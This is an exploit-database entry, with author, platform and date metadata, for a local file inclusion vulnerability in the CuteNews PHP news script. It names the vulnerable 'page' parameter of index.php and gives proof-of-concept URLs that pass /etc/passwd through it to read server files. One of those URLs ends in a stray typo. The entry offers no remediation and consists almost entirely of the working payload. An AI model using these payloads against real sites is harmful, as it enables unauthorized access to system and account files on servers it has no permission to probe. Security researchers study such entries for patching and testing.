CuteNews - 'page' Local File Inclusion

Author: eidelweiss
type: webapps
platform: php
port: 
date_added: 2010-10-05  
date_updated: 2016-12-08  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comcutenews.1.4.6.zip  

raw file: 15208.txt  
==========================================================
	CuteNews (page) local File Inclusion Vulnerability
==========================================================
vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

	-=[p0c]=-

	http://127.0.0.1/index.php?page= [lfi]
			or
	http://127.0.0.1/path/index.php?page=/etc/passwdt

=========================| -=[ E0F ]=- |============================